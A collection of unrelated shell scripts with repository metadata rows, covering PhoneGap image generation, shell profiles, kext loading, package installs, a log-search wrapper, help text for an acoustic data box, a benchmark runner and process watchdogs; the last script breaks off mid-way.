no_license
|
#!/bin/bash
# Generate PhoneGap icon and splash screens.
# Copyright 2013 Tom Vincent <http://tlvince.com/contact>
usage() { echo "usage: $0 icon colour [dest_dir]"; exit 1; }
[ "$1" ] && [ "$2" ] || usage
[ "$3" ] || set "$1" "$2" "."
devices=android,bada,bada-wac,blackberry,ios,webos,windows-phone
eval mkdir -p "$3/{icon,screen}"
# Show the user some progress by outputing all commands being run.
set -x
# Explicitly set background in case image is transparent (see: #3)
convert="convert $1 -background $2 -gravity center"
$convert -resize 192x320 "$3/screen/192x320.png"
$convert -resize 200x320 "$3/screen/200x320.png"
$convert -resize 225x225 "$3/screen/225x225.png"
$convert -resize 240x400 "$3/screen/240x400.png"
$convert -resize 288x480 "$3/screen/288x400.png"
$convert -resize 320x200 "$3/screen/320x200.png"
$convert -resize 320x480 "$3/screen/320x480.png"
$convert -resize 480x320 "$3/screen/480x320.png"
$convert -resize 480x800 "$3/screen/480x800.png"
$convert -resize 480x800 "$3/screen/480x800.jpg"
$convert -resize 640x1136 "$3/screen/640x1136.png"
$convert -resize 649x960 "$3/screen/649x960.png"
$convert -resize 640x960 "$3/screen/640x960.png"
$convert -resize 720x1200 "$3/screen/720x1200.png"
$convert -resize 720x1280 "$3/screen/720x1280.png"
$convert -resize 768x1004 "$3/screen/768x1004.png"
$convert -resize 768x1024 "$3/screen/768x1024.png"
$convert -resize 800x480 "$3/screen/800x480.png"
$convert -resize 960x640 "$3/screen/960x640.png"
$convert -resize 1280x720 "$3/screen/1280x720.png"
$convert -resize 1024x768 "$3/screen/1024x768.png"
$convert -resize 1024x783 "$3/screen/1024x783.png"
$convert -resize 1536x2008 "$3/screen/1536x2008.png"
$convert -resize 1536x2048 "$3/screen/1536x2048.png"
$convert -resize 2008x1536 "$3/screen/2008x1536.png"
$convert -resize 2048x1536 "$3/screen/2048x1536.png"
| true
|
13f14b1ecf1287be80293e217daa760b8e1b9e63
|
Shell
|
franckh/env_projects
|
/.bash_profile
|
UTF-8
| 538
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/sh
echo 'load ~/dev/home/.bash_profile'
source ~/.bash/aliases.bash
#source ~/.bash/functions
source ~/.bash/completions.bash
#source ~/.bash/paths
#source ~/.bash/config
#source ~/.bash/history_config
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi
# Enable RVM
#[[ -s $HOME/.rvm/scripts/rvm ]] && source $HOME/.rvm/scripts/rvm
# prompt
if [ `declare -F __git_ps1` ]; then
# git available
export PS1='\[\033]0;$MSYSTEM:\w\007\033[32m\]\[\033[1;36m\w$(__git_ps1)\033[0m\] \n$ '
else
export PS1="\e[1;36m[\!]\w# \e[m"
fi
| true
|
f1aa8f7cb977618f9305d398fa19983de48fce22
|
Shell
|
pvinis/Karabiner
|
/files/extra/startup.sh
|
UTF-8
| 668
| 3.265625
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin; export PATH
basedir='/Library/Application Support/org.pqrs/Karabiner'
# --------------------
argument="$1"
[ -z "$argument" ] && argument=start
case "$argument" in
start)
if [ -f /etc/karabiner_kextload_delay ]; then
delay=`ruby -e 'print $stdin.read.to_i' < /etc/karabiner_kextload_delay`
sleep $delay
fi
echo "Starting Karabiner"
kextload "$basedir/Karabiner.signed.kext"
;;
stop)
echo "Stopping Karabiner"
kextunload -b org.pqrs.driver.Karabiner
;;
*)
echo "Usage: $0 {start|stop}"
;;
esac
exit 0
| true
|
b4f1d9736eea0ce8ab1c965f0058532d2587a41c
|
Shell
|
marwahaha/multiverse-development
|
/portal-gun/portals/controller.portals/network.controller.portals/debian9.network.portal/portals/universe.router.portal/packages.sh
|
UTF-8
| 573
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
# Multiverse OS Script Color Palette
header="\e[0;95m"
accent="\e[37m"
subheader="\e[98m"
strong="\e[96m"
text="\e[94m"
success="\e[92m"
reset="\e[0m"
echo -e $header"Multiverse OS: Universe Router Package Installer"$reset
echo -e $accent"==============================================="$reset
echo -e $subpackage"# Packages"$reset
echo -e $text"apk updating..."$reset
apk update
echo -e $text"apk installing dhcp..."$reset
apk add dhcp
echo -e $text"apk installing shorewall..."$reset
apk add shorewall
echo -e $success"Package installation completed."$reset
| true
|
114c856e5b9bbd998e46f16c09329ff9eb639000
|
Shell
|
Stolz/laravel
|
/bin/stats
|
UTF-8
| 420
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# get stats about the code
source "$( cd "$( dirname "$0" )" && pwd )/common" || exit 1
go_to_laravel_dir
command -v cloc >/dev/null 2>&1 || exit_error "'cloc' program not found. Install it from https://github.com/AlDanial/cloc"
DIRS='app bin config database resources routes tests'
echo
color "Code stats (lines)" purple
cloc $DIRS
echo
color "Code stats (percentage)" purple
cloc $DIRS --by-percent c
| true
|
05677d59240b90cd0b7e2377358a987274121b45
|
Shell
|
werstatyw/siebel15
|
/STAGING-ROLES/searchPatternMultiMonForAA/srchPtrn.ksh
|
UTF-8
| 8,208
| 3.796875
| 4
|
[] |
no_license
|
#!/usr/bin/ksh
# srchPtrn.ksh
# Created by Rashid Khan, TSO
# Version: 4.0
# Date Created: 24-Nov-2016
# Date Updated: 28-Jun-2017
# Date Updated: 21-Sep-2017
# Date Updated: 13-Dec-2017 - Added Lock file
# Date Updated: 19-Jan-2018 - Modified to handle multiple monitors concurrently
#
# Turn on the debug and write into logging Utils\debug folder with timestamp in file name
# This script is calling a python script to do an case insensitive search in given file(s).
# 1. Search Pattern string or strings with pipe ('%') in between
# please enclose the whole parameter with double qoute for search string pattern
# 2. File patterns to be searched or file patern strings with pipe ('|') in between
# please enclose the whole parameter with double qoute for search string pattern.
#
# script will return number of occurences for SUCCESS and 0 for FAILURE.
# Script creates outputs in the same log directory where search has to be done .
#
# some example command line for the script:
#
#set -x
##================v4-moved below variables to init_srchPtrn.ksh
#SCRIPT_NAME=srchPtrn.py
#DEBUG_DIR='/opt/tso/tomcat/aaAgent.conf/Utils/debug'
#OUTPUT_FILE="${DEBUG_DIR}/srchPtrn-output.log.`date +%Y%m%d-%H%M%S`"
#TMP_FILE="${DEBUG_DIR}/srchPtrn-output1.log"
#BASS_DIR="/opt/tso/tomcat/aaAgent.conf/Utils"
#typeset -r LOCKFILE="${BASS_DIR}/srchPtrn.lock"
#typeset -ir LOCKWAITTIME=2 # seconds
# Globals expected from init_srchPtrn.ksh: SCRIPT_NAME, DEBUG_DIR, OUTPUT_FILE,
# BASS_DIR, LOCKFILE, LOCKWAITTIME, DEBUG_MSG.
. ./init_srchPtrn.ksh #v4 - source all global variables
# Remove the lock and temporary file if the script is interrupted before it ends normally.
trap 'rm -f $LOCKFILE ${BASS_DIR}/srchPtrn.confg_new' 2 3 9 15 255 # 0=normal exit - v4
##check operating system for AIX, to set python path
if [ `uname` == 'AIX' ]
then
export PYTHON_BIN='/opt/opsware/agent/bin/python'
export PATH=$PATH:$PYTHON_BIN
fi
##start-v4 changes
#if [ $# -lt 2 ]
# Argument check: needs <monitor-id> <file-pattern> <search-strings>.
if [ $# -lt 3 ]; then
echo "Usage: $0 <Unique Monitor ID> <FILE_PATTERN with full path> <Search strings> " > ${OUTPUT_FILE}
echo "where: Unique Monitor ID required to identify last read positions for files in srchPtrn.confg" >> ${OUTPUT_FILE}
echo " File_PATTERN could be multiple files with full path using wild card '*' or separated by %" >> ${OUTPUT_FILE}
echo " Search strings could be multiple Search strings separated by % >" >> ${OUTPUT_FILE}
#echo "Usage: $0 <FILE_PATTERN with full path> <PRIMARY Search strings> [SECONDARY Search strings ] " > ${OUTPUT_FILE}
#exit 0
# NOTE(review): `return` at top level (not inside a function) — in ksh this
# only works when the script is dot-sourced; confirm how callers invoke it.
return 1
else
MONITOR_ID=$1
OUTPUT_FILE="${DEBUG_DIR}/srchPtrn-output-${MONITOR_ID}.log.`date +%Y%m%d-%H%M%S`"
export MONITOR_ID OUTPUT_FILE
fi
# Extract this monitor's saved read positions from the shared config file
# into a per-monitor temp file (created empty if no prior records exist).
if [ -f ${BASS_DIR}/srchPtrn.confg ]; then
# if file srchPtrn.confg exists then
# - Read the last position configuration file srchPtrn.confg for its own process ID and create a temporary srchPtrn.confg_processID
egrep "^${MONITOR_ID}" ${BASS_DIR}/srchPtrn.confg > /dev/null
if [ $? -eq 0 ]; then
if [ $DEBUG_MSG -gt 0 ]; then
echo "found records in ${BASS_DIR}/srchPtrn.confg" ## testing
fi
egrep "^${MONITOR_ID}" ${BASS_DIR}/srchPtrn.confg > $BASS_DIR/srchPtrn.confg_$MONITOR_ID
else
if [ $DEBUG_MSG -gt 0 ]; then
echo "NOT found records in ${BASS_DIR}/srchPtrn.confg" ## testing
fi
touch ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
fi
else
# else if file srchPtrn.confg DOES NOT exist then
# - create srchPtrn.confg
if [ $DEBUG_MSG -gt 0 ]; then
echo "file ${BASS_DIR}/srchPtrn.conf Not found . create new one.."
fi
touch ${BASS_DIR}/srchPtrn.confg
touch ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
fi
#temporary file to keep monitor related last file read positions info
TMP_CONFIG_FILE=${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
if [ $DEBUG_MSG -gt 0 ]; then
echo "SCRIPT_NAME=$SCRIPT_NAME"
echo "BASS_DIR=$BASS_DIR"
echo "DEBUG_DIR=$DEBUG_DIR"
echo "OUTPUT_FILE=$OUTPUT_FILE"
#echo "TMP_FILE=$TMP_FILE" #v4 commented
echo "MONITOR_ID=$MONITOR_ID"
echo "TMP_CONFIG_FILE=$TMP_CONFIG_FILE"
fi
# The python helper lives next to this script.
SCRIPT_NAME_WPATH=`dirname $0`/$SCRIPT_NAME
#FILE_PATRN=$1 #v4-commented
FILE_PATRN=$2 #v4-added
#PRIMARY_SRCH_PTRN=$2 #v4-commented
PRIMARY_SRCH_PTRN=$3 #v4-added
# Start a fresh output log for this run.
cat /dev/null > ${OUTPUT_FILE}
echo "Run Date/Time: "`date` >> ${OUTPUT_FILE}
#
echo "\nFILE_PATRN: $FILE_PATRN\n" >> ${OUTPUT_FILE}
echo "\nPRIMARY_SRCH_PTRN: $PRIMARY_SRCH_PTRN\n" >> ${OUTPUT_FILE}
ret_val=0
echo "\nCommnad: $0 $*" >> ${OUTPUT_FILE}
# Delegate the actual search to the python helper; its exit status is the
# occurrence count (or 255 on error) per the header comment.
python "${SCRIPT_NAME_WPATH}" "${FILE_PATRN}" "${PRIMARY_SRCH_PTRN}" >> ${OUTPUT_FILE} ##v4
ret_val=$?
if [ $DEBUG_MSG -gt 0 ]; then
echo "\nret_val=$ret_val \n" ##testing
fi
##start testing
if [ $DEBUG_MSG -gt 0 ]; then
echo "temp monitor cfg: ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}"
cat ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
fi
###v4 changes
## update srchPtrn.config master file for the Monitor ID
#- get lock on srchPtrn.confg for writing
# If lockfile exists, wait for it to go away.
# Poll up to 15 times, LOCKWAITTIME seconds apart, then give up.
if [ -f $LOCKFILE ]; then
print "Waiting...\c"
icounter=0
while [ -f $LOCKFILE ] && [ $icounter -lt 15 ]
do
sleep $LOCKWAITTIME
((icounter=$icounter+1))
print "waiting for icounter $icounter"
if [ $icounter -gt 14 ]; then
echo "File $BASS_DIR/srchPtrn.confg locked ... retried 5 times. No luck, goodbye " >> ${OUTPUT_FILE}
echo "Search results for the Monitor ID '$MONITOR_ID' is in $BASS_DIR/srchPtrn.confg_$MONITOR_ID but FAILED to update $BASS_DIR/srchPtrn.config master file" >> ${OUTPUT_FILE}
#exit 1
return 1
fi
done
fi
# LOCKFILE does not exist so create it.
if [ $DEBUG_MSG -gt 0 ]; then
print "$BASS_DIR/srchPtrn.confg locked by $MONITOR_ID"
fi
print "$BASS_DIR/srchPtrn.confg locked by $MONITOR_ID" > $LOCKFILE
chmod 444 $LOCKFILE
#- create backup of srchPtrn.confg i.e. srchPtrn.confg_bak
cp -p $BASS_DIR/srchPtrn.confg $BASS_DIR/srchPtrn.confg_bak
#- Read the last position configuration file srchPtrn.confg for its own process ID and create an output file srchPtrn.confg_new without own process ID records
egrep -v "^${MONITOR_ID}" ${BASS_DIR}/srchPtrn.confg > ${BASS_DIR}/srchPtrn.confg_new
if [ $? -eq 0 ]; then
#- overwrite srchPtrn.confg with srchPtrn.confg_new, to make it without processID rows
cp ${BASS_DIR}/srchPtrn.confg_new ${BASS_DIR}/srchPtrn.confg
fi
#- append srchPtrn.confg_processID into srchPtrn.confg i.e. srchPtrn.confg_processID > srchPtrn.confg
cat ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID} >> ${BASS_DIR}/srchPtrn.confg
if [ $? -eq 0 ]; then
#- delete srchPtrn.confg_processID & srchPtrn.confg_new
rm -f ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID} ${BASS_DIR}/srchPtrn.confg_new
else
echo "Error: Unable to append new file positions into $BASS_DIR/srchPtrn.confg for completed search processing. please check files $BASS_DIR/srchPtrn.confg_$MONITOR_ID and $BASS_DIR/srchPtrn.confg_new"
return 1
fi
#- unlock srchPtrn.confg for writing
#rm -f $LOCKFILE
###end -v4 changes
#check ret_val returned from Python process
# NOTE(review): the `[ -f ${LOCKFILE} ]; rm -f ${LOCKFILE}` lines below are
# two independent statements — the test result is discarded and rm always
# runs; harmless with -f, but presumably `&&` was intended.
if [[ ${ret_val} -gt 0 ]]; then
head -36 ${OUTPUT_FILE}
echo "\n========================================================================="
echo "\n***** for full summary report, please check log file ${OUTPUT_FILE} ********"
echo "\n========================================================================="
if [[ ${ret_val} -lt 255 ]]; then
#rm -f ${LOCKFILE} ##v4 -commented
[ -f ${LOCKFILE} ]; rm -f ${LOCKFILE} #v4
exit ${ret_val}
else
#rm -f ${LOCKFILE} ##v4 -commented
[ -f ${LOCKFILE} ]; rm -f ${LOCKFILE} #v4
exit 255
fi
else
echo "\n========================================================================="
echo "\n***** for full summary report, please check log file ${OUTPUT_FILE} ********"
echo "\n========================================================================="
#[ -f ${strRunLog} ]; rm -f ${strRunLog} ##v4 -commented
[ -f ${LOCKFILE} ]; rm -f ${LOCKFILE}
exit ${ret_val}
fi
#[ -f ${strRunLog} ]; rm -f ${strRunLog} ##v4 -commented
[ -f ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID} ]; rm -f ${BASS_DIR}/srchPtrn.confg_${MONITOR_ID}
| true
|
d86910e83e146712e37f9928f0aa0da800be695f
|
Shell
|
poxstone/BASH_REPO
|
/cloudshell/i.sh
|
UTF-8
| 1,172
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
# Provision a Cloud Shell-style box: install a requested Node.js version via
# nvm (default major version: 8), global npm tooling (stylus, nib, bower,
# @angular/cli), and nmap if missing.
#
# Usage: ./i.sh [node-version]
userDir=$HOME
localDir="/usr/local/nvm"
#localDir="$HOME/.nvm"
# define version node — first CLI argument, defaulting to "8"
nodeV=${1:-8}
# load profile and environment vars for use in this bash
. "$localDir/nvm.sh"; . "$userDir/.profile"
# Change node version quietly (may fail harmlessly if not yet installed).
nvm use "$nodeV" >> /dev/null
# Install node if `node -v` does not already report the requested version.
if [[ $(node -v 2>&1) != *"v$nodeV"* ]];then
  echo "----------install node $nodeV------------";
  sudo su <<EOF
whoami
. $localDir/nvm.sh; . $userDir/.profile;
nvm install $nodeV;
nvm use $nodeV >> /dev/null;
EOF
fi;
# Install global npm tooling if stylus is not available yet.
if [[ $(stylus --version 2>&1) == *"command not found"* ]];then
  echo "----------install node tools for $nodeV------------";
  sudo su <<EOF
whoami;
. $localDir/nvm.sh; . $userDir/.profile;
# use v node as normal user cation
nvm use $nodeV >> /dev/null;
npm install -g stylus nib bower @angular/cli;
EOF
fi;
# BUG FIX: the original guard was `[[ ! $(whereis nmap) ]]`, but whereis
# always prints at least "nmap:" whether or not the binary exists, so the
# condition was always false and nmap was never installed. `command -v`
# correctly tests whether nmap is on PATH.
if ! command -v nmap >/dev/null 2>&1; then
  echo "----------install nmap------------";
  sudo su <<EOF
whoami;
apt-get install nmap -y;
echo "tools installed";
EOF
fi;
| true
|
66666e8357b5659db5a12954c87aca585d815ded
|
Shell
|
caileighf/ACBOX
|
/scripts/debug/echo_help.sh
|
UTF-8
| 10,524
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Prints help messages for ACBOX
#
# With no arguments it prints every help section; with "welcome" it prints
# the banner/welcome text; otherwise each --flag selects one section (see
# USAGE below). Section text lives in the heredoc variables that follow;
# \033[…m sequences are ANSI bold/reset codes interpreted by `echo -e`.
PRINT_HEADER=true
HEADER=$(cat <<-END
------------------------------------------------------
| \033[1mHelp Message for the Acoustic Data Acquisition Box\033[0m |
------------------------------------------------------
END
)
DEBUG_HELP=$(cat <<-END
\033[1mDEBUGGING INFO AND HELPFUL SHORTCUTS\033[0m
------------------------------------
Remote Debugging Help/Tools:
Useful aliases: (type directly from the prompt)
$ has_fix # find out if GPS has fix
$ has_pps # find out if PPS is being used
$ get_loc # echo lat, lon and, google maps link
$ see_daq # checks if DAQ is connected
$ daq_state # checks if DAQ is Running or Idle
$ help # show complete help message | less
$ help_cli # show cli-spectrogram help message | less
$ help_daq # show MCC_DAQ driver help message | less
$ help_debug # show THIS help message | less
$ help_offload # show data offload help message | less
$ get_volume # get volume on RPi headphone jack
$ get_cpu_temp # get cpu temp in celsius
$ get_free_mem # get remaining disk space
GNU screen status bar section info
1. [$USER@$HOST | DAQ state: Idle]
| | |
| | -- User selectable (see next table)
| --------------- Host machine
--------------------- Current user
2. no fix state: [ GPS HAS NO FIX ]
gpsd error: [ No GPS data ]
fix state:
[ 41.525098,-70.672022 - https://maps.google.com/maps?q=41.525098,+-70.672022 ]
| | |
| | --- URL to google maps location
| ------------------- Longitude (Decimal Degrees)
------------------------------- Latitude (Decimal Degrees)
3. [system time: 10/11/20 14:50:17] -- Current system date/time
Change screen session status bar:
* C-a --> Ctrl + a
C-a t -- show cpu temp ----------------------- [$USER@$HOSTNAME | cpu temp: 49.4'C]
C-a l -- show system load -------------------- [$USER@$HOSTNAME | cpu load: 0.02 0.14 0.10]
C-a s -- show volume on RPi headphone jack --- [$USER@$HOSTNAME | volume: -20.00dB]
C-a m -- show available disk space ----------- [$USER@$HOSTNAME | free space: 53G]
C-a u -- show machine up time ---------------- [$USER@$HOSTNAME | up since: 2020-09-29 15:58:51]
C-a D -- show DAQ state (Default at launch) -- [$USER@$HOSTNAME | DAQ state: Idle]
Other helpful screen keyboard shortcuts:
C-a ? --- Show screen keyboard shortcuts
C-a ESC - Scroll mode (hit ESC again to exit)
C-a w --- Show all windows
C-a F2 -- Puts Screen into resize mode.
Resize regions using hjkl keys
C-a f --- Hide both status bars
C-a F --- Show both status bars
END
)
CLI_HELP=$(cat <<-END
\033[1mUSING THE CLI-SPECTROGRAM\033[0m
-------------------------
Start Command Line Spectrogram:
$ cli_spectrogram [OPTIONS] # alias to launch cli_spectrogram.py
$ cli_spectrogram_auto # starts cli-spectrogram with DAQ config file
Useful shortcuts:
"f" -----> Toggle fullscreen
"c" -----> Cycle through channels
"B" -----> Go to beginning of data set
"A" -----> Go back 10 mins
"a" -----> Go back 1 min
"D" -----> Go forward 10 mins
"d" -----> Go forward 1 min
"PgDn" --> Previous file
"PgUp" --> Next file
"ESC" ---> Back to real-time
"Up" ----> Increase threshold (dB)
"Down" --> Decrease threshold (dB)
"^Up" ---> Increase NFFT
"^Down" -> Decrease NFFT
END
)
MCCDAQ_HELP=$(cat <<-END
\033[1mSTART COLLECTING DATA\033[0m
---------------------
Start Acoustic Data Collection:
Default data directory:
/home/$USER/ACBOX/MCC_DAQ/data/
Commands:
$ config_daq # Interactive config
$ start_collect # Start data acquisition
$ kill_daq # Kill DAQ (same as Ctrl+c in shell where it was started)
END
)
OFFLOAD_HELP=$(cat <<-END
\033[1mOFFLOADING/TRANSFERRING DATA\033[0m
----------------------------
The following rsync scripts are for ease of offloading/transferring data
to a remote machine. They will not create duplicate files on the remote machine so.
Running any of these scripts with --dry-run
rsync_all --------> Transfer all data files using the data directory ..
.. in the config.json file for the DAQ (.../MCC_DAQ/config.json)
It will NOT delete files on source or remote machine
rsync_clean ------> Transfer all data files using the data directory ..
.. in the config.json file for the DAQ (.../MCC_DAQ/config.json)
It will not delete files on the remote machine
\033[1m* FILES WILL BE DELETED ON SOURCE MACHINE AFTER TRANSFER *\033[0m
rsync_parallel ---> Starts a transfer periodically (-s <FREQ-SEC>)
It will NOT delete files on source or remote machine
Offloading/Transferring Data:
$ screen -R ACBOX # attach to screen session setup for ACBOX
$ rsync_all -u <REMOTE-USER> -i <REMOTE-IP-ADDRESS> -d <REMOTE-DEST>
$ rsync_clean -u <REMOTE-USER> -i <REMOTE-IP-ADDRESS> -d <REMOTE-DEST>
---------------- SSH keys need to be setup for the parallel rsync mode ----------------
----- This avoids the process being blocked while waiting for the remote password -----
---------------------------------------------------------------------------------------
$ rsync_parallel -u <REMOTE-USER> -i <REMOTE-IP-ADDRESS> -d <REMOTE-DEST> -s <FREQ-SEC>
------------------- SSH keys should be setup for the auto rsync mode ------------------
----------------------- In this mode NO user input is required ------------------------
---------------------------------------------------------------------------------------
$ config_rsync # configure rsync remote client info for rsync_auto
$ rsync_auto # this alias calls a script called rsync_auto.sh that has the remote
# info saved in rsync_config.json
END
)
GPS_HELP=$(cat <<-END
\033[1mGPS Logger\033[0m
----------
To start the gps logger run:
$ start_logging_gps
This will output data to stdout AND a file.
The actual command is:
$ gpspipe -t -uu -r | tee $HOME/ACBOX/gps_logger/data/track_$(date +%s).nmea
END
)
HLINE=$(cat <<-END
\n ---------------------------------------------------
END
)
SCREEN_MSG=$(cat <<-END
\033[1m
==========================================================================================
==================== YOU ARE CURRENTLY IN THE ACBOX SCREEN SESSION... ====================
==========================================================================================
\033[0m
END
)
WELCOME=$(cat <<-END
$(cat $HOME/ACBOX/scripts/banner.txt)
\033[1mHelpful keyboard shortcuts and aliases:\033[0m
$ help # show complete help message
$ show_welcome # show this message again
\033[1mStart/Monitor Data Collection:\033[0m
$ screen -R ACBOX # attach to screen session setup for ACBOX
$ config_daq # interactive config
$ start_collect # start data collection with config file
--
$ cli_spectrogram # starts cli-spectrogram
$ cli_spectrogram_auto # starts cli-spectrogram with DAQ config file
\033[1mOffloading Data:\033[0m
$ screen -R ACBOX # attach to screen session setup for ACBOX
$ rsync_auto # configure by running $ config_rsync
\033[1mACBOX screen session:\033[0m
The ACBOX screen session has the following four windows:
0 - "DAQ": [C-a 0] For running the cli-spectrogram
1 - "cli": [C-a 1] For running the config_daq and start_collect processes
2 - "sync": [C-a 2] For running rsync scripts and watching progress (if parallel)
3 - "debug": [C-a 3] For debugging
4 - "GPS": [C-a 4] For GPS logging
\033[1mTo exit and detach:\033[0m
C-a d -----> Detatches the screen session. All processes will continue running
$ exit ----> End ssh session
END
)
USAGE=$(cat <<-END
usage: ./echo-help.sh # for BOTH help messages
./echo-help.sh --mccdaq # for MCC_DAQ help
./echo-help.sh --cli # for cli-spectrogram help
./echo-help.sh --offload # for rsync help
./echo-help.sh --debug # for debugging help
./echo-help.sh --gps # for GPS logging help
./echo-help.sh --help/-h # print this usage message
END
)
# Print every help section in order, separated by horizontal rules.
function print_help {
echo -e "\n\
$HEADER\n\
$MCCDAQ_HELP\
$HLINE\n\
$CLI_HELP\
$HLINE\n\
$OFFLOAD_HELP\
$HLINE\n\
$DEBUG_HELP\n";
}
MSG=""
# Dispatch: no args -> full help; "welcome" -> banner; otherwise map each
# --flag to its section. Unknown flags print USAGE and abort via SIGINT.
if [[ "$#" = 0 ]] ; then
    print_help
elif [[ "$1" = "welcome" ]] ; then
    PRINT_HEADER=false
    printf "\n$WELCOME\n"
else
    for ARG in "$@"; do
        # check for known args
        if [ "$ARG" = "--mccdaq" ]; then
            MSG="$MCCDAQ_HELP"
        elif [ "$ARG" = "--cli" ]; then
            MSG="$CLI_HELP"
        elif [ "$ARG" = "--debug" ]; then
            MSG="$DEBUG_HELP"
        elif [ "$ARG" = "--offload" ]; then
            MSG="$OFFLOAD_HELP"
        elif [ "$ARG" = "--gps" ]; then
            MSG="$GPS_HELP"
        elif [ "$ARG" = "--screen" ]; then
            printf "\n$WELCOME\n$SCREEN_MSG\n"
            kill -SIGINT $$
        else
            printf "$USAGE\n"
            kill -SIGINT $$
        fi
        # print header on first iter
        # .. the following iterations will add hline
        # ($PRINT_HEADER holds the command name "true"/"false", so this
        # runs the true/false builtin as the condition.)
        if "$PRINT_HEADER" ; then
            echo -e "\n$HEADER\n"
            echo -e "$MSG"
            PRINT_HEADER=false
        else
            echo -e " $HLINE"
            echo -e "$MSG"
        fi
        MSG=""
    done
fi
echo ""
| true
|
71ade15b803819ef2bf3b9dd76388372db10963c
|
Shell
|
wxart/tfstair
|
/docker-entrypoint.sh
|
UTF-8
| 611
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/sh
# Container entrypoint: start tair or tfs depending on the first argument,
# otherwise exec the given command unchanged.
#
# BUG FIX: the first branch used `[ "$1" == "tair" ]`. `==` is a bashism —
# under a POSIX /bin/sh (dash/ash, the usual shell in containers) the test
# fails with "unexpected operator" and the tair branch can never be taken.
# Both branches now use the portable `=`.
LOCAL_IP=$(hostname -i)
if [ "$1" = "tair" ]; then
    # Patch the placeholder address in the tair configs with this container's IP.
    sed -i "s/192.168.1.1/${LOCAL_IP}/g" /usr/local/tair/etc/*.conf
    /usr/local/tair/tair.sh start_ds && /usr/local/tair/tair.sh start_cs
    # Keep the container alive by following the server log.
    tail -200f /usr/local/tair/logs/server.log
elif [ "$1" = "tfs" ]; then
    # Patch the placeholder address in the tfs configs with this container's IP.
    sed -i "s/172.17.0.2/${LOCAL_IP}/g" /usr/local/tfs/conf/*.conf
    # Format the data store only on first run (fs_super absent).
    if [ ! -f "/data/tfs1/fs_super" ]; then
        /usr/local/tfs/scripts/stfs format 1
    fi
    /usr/local/tfs/scripts/tfs start_ns
    sleep 3
    /usr/local/tfs/scripts/tfs start_ds 1
    tail -f /usr/local/tfs/logs/dataserver_1.log
else
    exec "$@"
fi
| true
|
8e87cd1014c1a670c3f2c9510bab5d696b928afc
|
Shell
|
mathandy/esesc-project
|
/run_tinydnn.sh
|
UTF-8
| 1,188
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# USAGE: ./run_benchmark.sh <benchmark_name> <esesc_config_file> <simulation_config_file> <run_name> <log_path>
# e.g. ./run_benchmark.sh spec06_hmmer ~/Dropbox/esesc-lab/esesc.conf ~/Dropbox/esesc-lab/simu.conf testeroo ~/Dropbox/esesc-lab/test_results.txt
#
# Sets up a per-run directory under the esesc build tree, copies configs and
# benchmarks into it, runs the tiny-dnn CIFAR training example under esesc,
# and records the report to <log_path>.
# esesc parameters
esesc_dir=~/build/release
benchmarks_dir=~/benchmarks
conf_dir=~/projs/esesc/conf
data_path="$PWD"/tiny-dnn/data/cifar-10-batches-bin
binary_dir="$PWD"/tiny-dnn/examples
cpu=boom2
# parse CLI arguments
BENCHMARK=$1
ESESC_CONFIG=$2
SIMULATION_CONFIG=$3
RUN_NAME=$4
LOG=$5
# report CLI arguments
echo
echo ---
echo Running experiment \"$RUN_NAME\" with benchmark \"$BENCHMARK\" ...
echo
# setup directory for experiment
run_dir=$esesc_dir/$RUN_NAME
# ROBUSTNESS FIX: the original ran `mkdir $run_dir; cd $run_dir` unchecked —
# if mkdir failed (or cd failed) all subsequent rm/cp ran in the caller's
# directory. -p tolerates a pre-existing run dir; abort on cd failure.
mkdir -p "$run_dir"
cd "$run_dir" || exit 1
cp -r "$conf_dir"/* .
cp -r "$benchmarks_dir"/* .
# switch to config file using TASS (and higher instruction count)
rm -f esesc.conf
cp "$ESESC_CONFIG" esesc.conf
cp "$SIMULATION_CONFIG" "simu.conf.$cpu"
# run experiment/benchmark
cp -r "$binary_dir"/* .
ESESC_benchname="./example_cifar_train --data_path $data_path" ../main/esesc | tee last-run-log.txt
# record results
./scripts/report.pl -last | tee "$LOG"
echo "$PWD"
echo "$LOG"
| true
|
bd7b331f17e8dddcee12c5394c4fc9f24aeed4bb
|
Shell
|
jameshilliard/tyg-bitcoin
|
/sw/usefull-stuff/titan_scanminers
|
UTF-8
| 224
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Titan miner scan: build a detected-hosts list from the fixed IP file, pause,
# then hand the list to the scanner. An optional first CLI argument is
# forwarded as the scanner's second parameter.
if [ -n "$1" ]; then
  F2=$1
fi
IPFILE=/home/remo/scans/TITAN-IPS-81s
# Temporary file receiving the detection results.
F1=$(mktemp)
/home/remo/miner_scripts/createdetected_slow "$IPFILE" "$F1"
sleep 33
# F2 stays deliberately unquoted so it vanishes entirely when no argument
# was given (matching the scanner's expected arity).
/home/remo/miner_scripts/perform_scan.sh ${F1} ${F2}
| true
|
8f8230bcae78ac17c6590a00ffec1f9192c89e37
|
Shell
|
ErikZhou/scrape_twitter
|
/tw.sh
|
UTF-8
| 413
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
# Watchdog for the tw.py Twitter scraper: restart it (and log the restart)
# when it is not running, otherwise report that it is alive.
# Load environment variables first.
source /etc/profile
# BUG FIX: the original used `pgrep tw.py`, which matches the process *name*
# only — a script run as `python3 .../tw.py` shows up as "python3", so the
# count was always 0 and the scraper was restarted on every invocation.
# `-f` matches the full command line; the dot is escaped since the pattern
# is a regular expression.
processcount=$(pgrep -f 'tw\.py' | wc -l)
# Work from this script's own directory; abort rather than log elsewhere.
cd "$(cd "$(dirname "$0")" && pwd)" || exit 1
if [[ 0 -eq $processcount ]]
then
    echo "[ $(date) ] : tw.py is down, start it!" | tee -ai ./checkprocess.log
